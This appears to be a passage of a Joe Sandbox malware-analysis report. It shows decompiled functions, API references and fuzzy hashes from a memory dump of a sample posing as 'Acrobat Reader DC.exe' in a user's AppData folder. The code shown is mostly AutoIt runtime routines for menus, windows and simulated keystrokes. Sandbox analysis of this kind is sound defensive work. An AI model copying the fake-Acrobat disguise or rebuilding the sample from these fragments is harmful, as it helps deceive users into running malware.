								_t135 = E0040C650( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4)));
								goto L26;
							} else {
								switch( *((intOrPtr*)(_t173 * 4 +  &M00454611))) {
									case 0:
										 *__edi = 2;
										__edx =  *(__eax + 4);
										__eax =  *( *(__eax + 4) + __ebx * 4);
										__eax = E00443006( *( *(__eax + 4) + __ebx * 4));
										 *(__edi + 0xc) = __edx;
										goto L26;
									case 1:
										 *__edi = 3;
										__ecx =  *(__eax + 4);
										__ecx =  *( *(__eax + 4) + __ebx * 4);
										__eax = E0040BAA0(__ecx);
										 *(__edi + 8) = __fp0;
										goto L27;
									case 2:
										 *_t202 = 4;
										_t163 = E0040F6F0(E0045340C( *((intOrPtr*)( *((intOrPtr*)(_t134 + 4)) + _t159 * 4))), _t173 | 0xffffffff, _t203);
										_t141 = E004135BB(_t192, _t202, _t203, E00413530(_t163) + 1);
										_t211 = _t206 + 8;
										 *((intOrPtr*)(_t202 + 8)) = _t141;
										if(_t141 != 0) {
											E00413650(_t141, _t163);
											_t211 = _t211 + 8;
										}
										_push(_t163);
										E004111DC();
										_t159 = _a8;
										_t206 = _t211 + 4;
										goto L27;
									case 3:
										goto L25;
									case 4:
										 *__edi = 5;
										__eax =  *(__eax + __ebx * 4);
										__eax = E0044B3AC(__eax);
										L26:
										 *((intOrPtr*)(_t202 + 8)) = _t135;
										goto L27;
								}
							}
							L27:
							_t159 = _t159 + 1;
							_t202 = _t202 + 0x10;
							_a8 = _t159;
						} while (_t159 < _a12);
						_t201 = _a12;
						_t122 = _a4;
					}
					_v12 = 0;
					_a20(_t201, _t122,  &_v12, _a24, _a28);
					_t124 = _v12;
					_t207 = _t206 + 0x14;
					if(_t124 != 0) {
						_t168 =  *_t124 + 0xfffffffe;
						if(_t168 > 3) {
							_t160 =  *((intOrPtr*)(_t124 + 8));
							E00408F40(_t201, _t203);
							 *((intOrPtr*)(_t203 + 8)) = 1;
							goto L37;
						} else {
							switch( *((intOrPtr*)(_t168 * 4 +  &M00454629))) {
								case 0:
									_t160 =  *((intOrPtr*)(_t124 + 8));
									_v20 =  *((intOrPtr*)(_t124 + 0xc));
									E00408F40(_t201, _t203);
									 *((intOrPtr*)(_t203 + 8)) = 2;
									 *((intOrPtr*)(_t203 + 4)) = _v20;
									goto L37;
								case 1:
									__fp0 =  *(__eax + 8);
									_v24 =  *(__eax + 8);
									__eax = E00408F40(__edi, __esi);
									__fp0 = _v24;
									 *((intOrPtr*)(__esi + 8)) = 3;
									 *__esi = _v24;
									goto L38;
								case 2:
									__edx =  *(__eax + 8);
									__eax = E0043299A( *(__eax + 8), 0xffffffff);
									__ebx = __esi;
									__edi = __eax;
									__eax = E0040E710(__eax, __esi, __ecx);
									_push(__edi);
									__eax = E004111DC();
									__edi = _a12;
									__esp = __esp + 4;
									goto L38;
								case 3:
									__ebx =  *(__eax + 8);
									__eax = E00408F40(__edi, __esi);
									 *((intOrPtr*)(__esi + 8)) = 7;
									L37:
									 *_t203 = _t160;
									goto L38;
							}
						}
						L38:
						if(_t201 > 0) {
							_t204 = _a4;
							do {
								if( *_t204 == 4) {
									E00413748( *((intOrPtr*)(_t204 + 8)));
									_t207 = _t207 + 4;
								}
								_t204 = _t204 + 0x10;
								_t201 = _t201 - 1;
							} while (_t201 != 0);
						}
						E00413748(_a4);
						_t128 = _v16;
						if(_t128 != 0) {
							 *_t128(_v12);
						}
					}
					return 0;
				}
				L46:
			}




































                                  0x004542fa
                                  0x004542fe
                                  0x00454302
                                  0x00454304
                                  0x00454306
                                  0x00454308
                                  0x0045430d
                                  0x00454314
                                  0x0045431a
                                  0x0045431d
                                  0x00454320
                                  0x00454323
                                  0x00454328
                                  0x004543f8
                                  0x00454403
                                  0x0045432e
                                  0x0045432e
                                  0x00454339
                                  0x0045433c
                                  0x00454341
                                  0x004543e8
                                  0x004543e8
                                  0x004543ec
                                  0x00000000
                                  0x004543f2
                                  0x004543f6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004543f6
                                  0x00454347
                                  0x00454347
                                  0x00454349
                                  0x0045434f
                                  0x00000000
                                  0x00454355
                                  0x00454355
                                  0x00454358
                                  0x00454368
                                  0x0045436d
                                  0x00454372
                                  0x00000000
                                  0x00000000
                                  0x0045437a
                                  0x0045437d
                                  0x0045437f
                                  0x00454383
                                  0x00454384
                                  0x0045438a
                                  0x00000000
                                  0x0045438c
                                  0x00000000
                                  0x0045438c
                                  0x00000000
                                  0x0045438a
                                  0x00454399
                                  0x0045439c
                                  0x004543a4
                                  0x004543aa
                                  0x00454411
                                  0x004543b2
                                  0x004543cc
                                  0x004543cf
                                  0x004543d7
                                  0x004543e5
                                  0x00000000
                                  0x004543e5
                                  0x004543aa
                                  0x0045434f
                                  0x00000000
                                  0x00454341
                                  0x00454414
                                  0x0045441d
                                  0x00454422
                                  0x00454424
                                  0x00454427
                                  0x0045442a
                                  0x0045442f
                                  0x00454435
                                  0x0045443d
                                  0x0045443d
                                  0x00454449
                                  0x0045444f
                                  0x004544ed
                                  0x004544ed
                                  0x004544f9
                                  0x00000000
                                  0x00454455
                                  0x00454455
                                  0x00000000
                                  0x004544c2
                                  0x004544c8
                                  0x004544cb
                                  0x004544cf
                                  0x004544d4
                                  0x00000000
                                  0x00000000
                                  0x004544ac
                                  0x004544b2
                                  0x004544b5
                                  0x004544b8
                                  0x004544bd
                                  0x00000000
                                  0x00000000
                                  0x0045445c
                                  0x00454478
                                  0x00454485
                                  0x0045448a
                                  0x0045448d
                                  0x00454492
                                  0x00454496
                                  0x0045449b
                                  0x0045449b
                                  0x0045449e
                                  0x0045449f
                                  0x004544a4
                                  0x004544a7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004544d9
                                  0x004544e2
                                  0x004544e6
                                  0x004544fe
                                  0x004544fe
                                  0x00000000
                                  0x00000000
                                  0x00454455
                                  0x00454501
                                  0x00454501
                                  0x00454502
                                  0x00454505
                                  0x00454508
                                  0x00454511
                                  0x00454514
                                  0x00454514
                                  0x00454525
                                  0x0045452c
                                  0x0045452f
                                  0x00454532
                                  0x00454537
                                  0x0045453f
                                  0x00454545
                                  0x004545ba
                                  0x004545bd
                                  0x004545c2
                                  0x00000000
                                  0x00454547
                                  0x00454547
                                  0x00000000
                                  0x0045454e
                                  0x00454554
                                  0x00454557
                                  0x0045455f
                                  0x00454566
                                  0x00000000
                                  0x00000000
                                  0x0045456b
                                  0x0045456e
                                  0x00454571
                                  0x00454576
                                  0x00454579
                                  0x00454580
                                  0x00000000
                                  0x00000000
                                  0x00454595
                                  0x0045459b
                                  0x004545a3
                                  0x004545a5
                                  0x004545a7
                                  0x004545ac
                                  0x004545ad
                                  0x004545b2
                                  0x004545b5
                                  0x00000000
                                  0x00000000
                                  0x00454584
                                  0x00454587
                                  0x0045458c
                                  0x004545c9
                                  0x004545c9
                                  0x00000000
                                  0x00000000
                                  0x00454547
                                  0x004545cb
                                  0x004545cd
                                  0x004545cf
                                  0x004545d2
                                  0x004545d5
                                  0x004545db
                                  0x004545e0
                                  0x004545e0
                                  0x004545e3
                                  0x004545e6
                                  0x004545e6
                                  0x004545d2
                                  0x004545ed
                                  0x004545f2
                                  0x004545fa
                                  0x00454600
                                  0x00454602
                                  0x004545fa
                                  0x0045460d
                                  0x0045460d
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressProc_free_malloc$_strlen
                                  • String ID: AU3_FreeVar
                                  • API String ID: 3358881862-771828931
                                  • Opcode ID: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                  • Opcode Fuzzy Hash: 9189223602f4225252d80b21b209c7ea8eb6c5ba0733661d26557e2285be57dc
                                  • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045FBAC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 147windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045FBAC(struct HMENU__** _a4, short _a8, short* _a12, int _a16, int _a20, intOrPtr _a24) {
				struct tagMENUITEMINFOW _v52;
				int _t44;
				int _t50;
				struct HMENU__* _t53;
				int _t54;
				short _t58;
				struct HMENU__* _t64;
				int _t65;
				int _t66;
				struct HMENU__* _t68;
				struct HMENU__** _t70;
				int _t74;
				short* _t76;
				int _t79;
				signed int _t87;
				struct HMENU__** _t93;

				_t44 = _a16;
				_t70 = _a4;
				if(_t44 == 0xffffffff || _t44 >= 7 && _t44 < 0x207) {
					_t87 = E0044C2C9(_t70);
					if(_t87 == 0xffffffff) {
						goto L29;
					} else {
						_t93 =  *(_t70 + 0x1b4 + _t87 * 4);
						_v52.cbSize = 0x30;
						E00412F40( &(_v52.fMask), 0, 0x2c);
						_t49 = _a16;
						if(_a16 != 0xffffffff) {
							_a16 = 0xffffffff;
							_t50 = E00434179(_t70, _t49,  &_a16);
							__eflags = _t50;
							if(_t50 == 0) {
								L28:
								E0044422D(_t70, _t87);
								goto L29;
							} else {
								_t74 = _a16;
								_v52.fMask = 4;
								_t53 =  *( *(_t70 + 0x1b4 + _t74 * 4));
								 *_t93 = _t53;
								_t54 = GetMenuItemInfoW(_t53, _t74, 0,  &_v52);
								__eflags = _t54;
								if(_t54 == 0) {
									goto L28;
								} else {
									 *_t93 = _v52.hSubMenu;
									__eflags = IsMenu(_v52.hSubMenu);
									if(__eflags == 0) {
										goto L28;
									} else {
										goto L9;
									}
								}
							}
						} else {
							 *_t93 =  *_t70;
							L9:
							_t58 = _a8;
							_t76 = _a12;
							_t93[1] = 0;
							_v52.fMask = 0x32;
							_v52.fType = 0;
							_v52.dwTypeData = _t76;
							_v52.dwItemData = _t87;
							_v52.wID = _t87;
							if(_t58 == 0) {
								__eflags =  *_t76;
								if( *_t76 != 0) {
									__eflags = _a24 - 1;
									if(_a24 == 1) {
										_v52.fType = 0x200;
										_t93[1] = 1;
									}
								} else {
									_v52.fType = 0x800;
								}
								_t93[1] = 0;
								goto L19;
							} else {
								if(_t58 != 1) {
									L19:
									__eflags = _t70[1];
									if(_t70[1] != 0) {
										__eflags = _t70[2];
										if(_t70[2] != 0) {
											__eflags = _t87 - 7;
											if(_t87 >= 7) {
												_t64 =  *_t70;
												__eflags =  *_t93 - _t64;
												if( *_t93 == _t64) {
													_t65 = GetMenuItemCount(_t64);
													_t79 = _a20;
													__eflags = _t79 - 0xffffffff;
													if(_t79 == 0xffffffff) {
														L25:
														_t66 = _t65 + 0xfffffffc;
														__eflags = _t66;
														_a20 = _t66;
													} else {
														_t39 = _t65 - 4; // -4
														__eflags = _t79 + 1 - _t39;
														if(_t79 + 1 > _t39) {
															goto L25;
														}
													}
												}
											}
										}
									}
									__eflags = InsertMenuItemW( *_t93, _a20, 1,  &_v52);
									if(__eflags == 0) {
										goto L12;
									} else {
										_t70[0x275] = _t87;
										return _t87;
									}
								} else {
									_t68 = CreatePopupMenu();
									_t106 = _t68;
									if(_t68 != 0) {
										_v52.fMask = _v52.fMask | 0x00000004;
										_v52.hSubMenu = _t68;
										_t93[1] = 1;
										goto L19;
									} else {
										L12:
										E0045FA41(_t70, _t106, _t87);
										return 0;
									}
								}
							}
						}
					}
				} else {
					L29:
					__eflags = 0;
					return 0;
				}
			}



















                                  0x0045fbaf
                                  0x0045fbb6
                                  0x0045fbbe
                                  0x0045fbda
                                  0x0045fbdf
                                  0x00000000
                                  0x0045fbe5
                                  0x0045fbe5
                                  0x0045fbf4
                                  0x0045fbfb
                                  0x0045fc00
                                  0x0045fc09
                                  0x0045fc17
                                  0x0045fc1e
                                  0x0045fc23
                                  0x0045fc25
                                  0x0045fd45
                                  0x0045fd47
                                  0x00000000
                                  0x0045fc2b
                                  0x0045fc2b
                                  0x0045fc32
                                  0x0045fc40
                                  0x0045fc46
                                  0x0045fc48
                                  0x0045fc4e
                                  0x0045fc50
                                  0x00000000
                                  0x0045fc56
                                  0x0045fc59
                                  0x0045fc65
                                  0x0045fc67
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045fc67
                                  0x0045fc50
                                  0x0045fc0b
                                  0x0045fc0d
                                  0x0045fc6d
                                  0x0045fc71
                                  0x0045fc74
                                  0x0045fc77
                                  0x0045fc7b
                                  0x0045fc82
                                  0x0045fc89
                                  0x0045fc8c
                                  0x0045fc8f
                                  0x0045fc92
                                  0x0045fcc1
                                  0x0045fcc5
                                  0x0045fcd0
                                  0x0045fcd4
                                  0x0045fcd6
                                  0x0045fcdd
                                  0x0045fcdd
                                  0x0045fcc7
                                  0x0045fcc7
                                  0x0045fcc7
                                  0x0045fce1
                                  0x00000000
                                  0x0045fc94
                                  0x0045fc95
                                  0x0045fce5
                                  0x0045fce5
                                  0x0045fce9
                                  0x0045fceb
                                  0x0045fcef
                                  0x0045fcf1
                                  0x0045fcf4
                                  0x0045fcf6
                                  0x0045fcf8
                                  0x0045fcfa
                                  0x0045fcfd
                                  0x0045fd03
                                  0x0045fd06
                                  0x0045fd09
                                  0x0045fd13
                                  0x0045fd13
                                  0x0045fd13
                                  0x0045fd16
                                  0x0045fd0b
                                  0x0045fd0b
                                  0x0045fd0f
                                  0x0045fd11
                                  0x00000000
                                  0x00000000
                                  0x0045fd11
                                  0x0045fd09
                                  0x0045fcfa
                                  0x0045fcf4
                                  0x0045fcef
                                  0x0045fd2c
                                  0x0045fd2e
                                  0x00000000
                                  0x0045fd34
                                  0x0045fd34
                                  0x0045fd42
                                  0x0045fd42
                                  0x0045fc97
                                  0x0045fc97
                                  0x0045fc9d
                                  0x0045fc9f
                                  0x0045fcb4
                                  0x0045fcb8
                                  0x0045fcbb
                                  0x00000000
                                  0x0045fca1
                                  0x0045fca1
                                  0x0045fca4
                                  0x0045fcb1
                                  0x0045fcb1
                                  0x0045fc9f
                                  0x0045fc95
                                  0x0045fc92
                                  0x0045fc09
                                  0x0045fd4c
                                  0x0045fd4c
                                  0x0045fd4e
                                  0x0045fd54
                                  0x0045fd54

                                  APIs
                                  • _memset.LIBCMT ref: 0045FBFB
                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                  • IsMenu.USER32 ref: 0045FC5F
                                  • CreatePopupMenu.USER32(00000000,?,76F033D0), ref: 0045FC97
                                  • GetMenuItemCount.USER32 ref: 0045FCFD
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                  • String ID: 0$2
                                  • API String ID: 3311875123-3793063076
                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00434034(int _a4, char _a8) {
				short _v520;
				short _v1036;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t26;

				LoadStringW(GetModuleHandleW(0), _a4,  &_v520, 0x100);
				LoadStringW(GetModuleHandleW(0), 0x1389,  &_v1036, 0x100);
				_t29 = _a8;
				_t23 = _t21;
				_t26 = _t24;
				if(_a8 == 0) {
					return MessageBoxW(0,  &_v1036,  &_v520, 0x11010);
				} else {
					_push(0x484ea8);
					_push(0x484ea8);
					_push( &_v1036);
					_push(0);
					_push( &_v520);
					_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
					return E00413ABE(_t16,  &_v1036, _t23, _t26, _t29);
				}
			}













                                  0x00434060
                                  0x00434078
                                  0x0043407a
                                  0x0043407e
                                  0x0043407f
                                  0x00434086
                                  0x004340c2
                                  0x00434088
                                  0x00434088
                                  0x0043408d
                                  0x00434092
                                  0x00434093
                                  0x0043409b
                                  0x0043409c
                                  0x004340a9
                                  0x004340a9

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe), ref: 00434057
                                  • LoadStringW.USER32(00000000), ref: 00434060
                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                  • LoadStringW.USER32(00000000), ref: 00434078
                                  • _wprintf.LIBCMT ref: 004340A1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                  Strings
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00434040
                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3648134473-4247470361
                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E00441165(void* __edi, void* __esi, int _a4, intOrPtr _a8) {
				signed int _t23;
				int _t32;
				intOrPtr _t33;
				void* _t36;
				struct HWND__* _t37;
				void* _t41;
				struct HWND__** _t42;

				_t41 = __esi;
				_t36 = __edi;
				_t22 = _a8;
				_t32 = _a4;
				if(_a8 == 0) {
					_t23 =  *0x4a869c; // 0xffffffff
				} else {
					_t23 = E00430C09(_t22, 0x4a8630, _t22);
					 *0x4a869c = _t23;
				}
				if(_t23 != 0xffffffff) {
					_t33 =  *0x4a8690; // 0x0
					_push(_t41);
					_t42 =  *( *(_t33 + _t23 * 4));
					_push(_t36);
					_t37 =  *_t42;
					if(_t42[0xe] != 0) {
						_t42[0xe] = 0;
						if(_t42[0x64] >= 0 && _t42[0x67] != 0) {
							E00440A0D(0x4a8630, _t42, _t42[0x66]);
							_t42[0x67] = 0;
						}
					}
					if(_t32 > 0x43) {
						L24:
						return 1;
					} else {
						switch( *((intOrPtr*)(( *(_t32 + 0x44131d) & 0x000000ff) * 4 +  &M004412F5))) {
							case 0:
								__eax = ShowWindow(__edi, 0);
								_pop(__edi);
								__esi[0xe] = 0;
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 1:
								if(__esi[0xe] != 0) {
									goto L19;
								} else {
									__eax = ShowWindow(__edi, __ebx);
									if(__ebx != 8 && __ebx != 4) {
										__eax = E00434418(__edi);
									}
									_pop(__edi);
									__esi[0xe] = 1;
									_pop(__esi);
									__eax = 1;
									return 1;
								}
								goto L28;
							case 2:
								__esi[0xe] = 1;
								goto L17;
							case 3:
								if(_t42[0xe] == 0) {
									goto L19;
								} else {
									ShowWindow(_t37, _t32);
									E00434418(_t37);
									return 1;
								}
								goto L28;
							case 4:
								L17:
								if(__esi[0xe] == 0) {
									L19:
									return 0;
								} else {
									__eax = ShowWindow(__edi, 6);
									_pop(__edi);
									_pop(__esi);
									__eax = 1;
									return 1;
								}
								goto L28;
							case 5:
								__eax = EnableWindow(__edi, 1);
								_pop(__edi);
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 6:
								__eax = EnableWindow(__edi, 0);
								_pop(__edi);
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 7:
								__esi[0xe] = 1;
								__eax = LockWindowUpdate(__edi);
								_pop(__edi);
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 8:
								__esi[0xe] = 0;
								LockWindowUpdate(0) = InvalidateRect( *__esi, 0, 1);
								goto L24;
							case 9:
								goto L24;
						}
					}
				} else {
					return 0;
				}
				L28:
			}










                                  0x00441165
                                  0x00441165
                                  0x00441168
                                  0x0044116c
                                  0x00441171
                                  0x004412e0
                                  0x00441177
                                  0x0044117d
                                  0x00441182
                                  0x00441182
                                  0x004412e8
                                  0x0044118c
                                  0x00441195
                                  0x00441196
                                  0x0044119c
                                  0x0044119d
                                  0x0044119f
                                  0x004411a8
                                  0x004411ac
                                  0x004411c4
                                  0x004411c9
                                  0x004411c9
                                  0x004411ac
                                  0x004411d3
                                  0x004412d4
                                  0x004412dd
                                  0x004411d9
                                  0x004411e0
                                  0x00000000
                                  0x0044123c
                                  0x00441242
                                  0x00441243
                                  0x00441247
                                  0x00441248
                                  0x0044124f
                                  0x00000000
                                  0x00000000
                                  0x0044120f
                                  0x00000000
                                  0x00441211
                                  0x00441213
                                  0x0044121c
                                  0x00441224
                                  0x00441224
                                  0x00441229
                                  0x0044122a
                                  0x0044122e
                                  0x0044122f
                                  0x00441236
                                  0x00441236
                                  0x00000000
                                  0x00000000
                                  0x00441252
                                  0x00000000
                                  0x00000000
                                  0x004411eb
                                  0x00000000
                                  0x004411f1
                                  0x004411f3
                                  0x004411fa
                                  0x00441208
                                  0x00441208
                                  0x00000000
                                  0x00000000
                                  0x00441256
                                  0x0044125a
                                  0x00441271
                                  0x00441277
                                  0x0044125c
                                  0x0044125f
                                  0x00441265
                                  0x00441266
                                  0x00441267
                                  0x0044126e
                                  0x0044126e
                                  0x00000000
                                  0x00000000
                                  0x00441292
                                  0x00441298
                                  0x00441299
                                  0x0044129a
                                  0x004412a1
                                  0x00000000
                                  0x00000000
                                  0x0044127d
                                  0x00441283
                                  0x00441284
                                  0x00441285
                                  0x0044128c
                                  0x00000000
                                  0x00000000
                                  0x004412a5
                                  0x004412a9
                                  0x004412af
                                  0x004412b0
                                  0x004412b1
                                  0x004412b8
                                  0x00000000
                                  0x00000000
                                  0x004412bd
                                  0x004412ce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004411e0
                                  0x004412ee
                                  0x004412f2
                                  0x004412f2
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445E52 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E00445E52(struct HWND__** _a4, intOrPtr _a8) {
				struct HWND__** _t27;

				_t27 = _a4;
				E00445AA7( *_t27, 1);
				_push(MapVirtualKeyW(0x25, 0) << 0x00000010 | 0x00000001);
				if(_a8 >= 0) {
					PostMessageW( *_t27, 0x100, 0x27, ??);
					Sleep(0);
					PostMessageW( *_t27, 0x101, 0x27, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
				} else {
					PostMessageW( *_t27, 0x100, 0x25, ??);
					Sleep(0);
					PostMessageW( *_t27, 0x101, 0x25, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
				}
				Sleep(0);
				E00445AA7( *_t27, 0);
				return 1;
			}




                                  0x00445e57
                                  0x00445e60
                                  0x00445e7b
                                  0x00445e7c
                                  0x00445ebd
                                  0x00445ecb
                                  0x00445ee6
                                  0x00445e7e
                                  0x00445e88
                                  0x00445e96
                                  0x00445ee6
                                  0x00445ee6
                                  0x00445eee
                                  0x00445ef5
                                  0x00445f00

                                  APIs
                                    • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                    • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                    • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                  • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                  • Sleep.KERNEL32(00000000), ref: 00445ECB
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                  Memory Dump Source
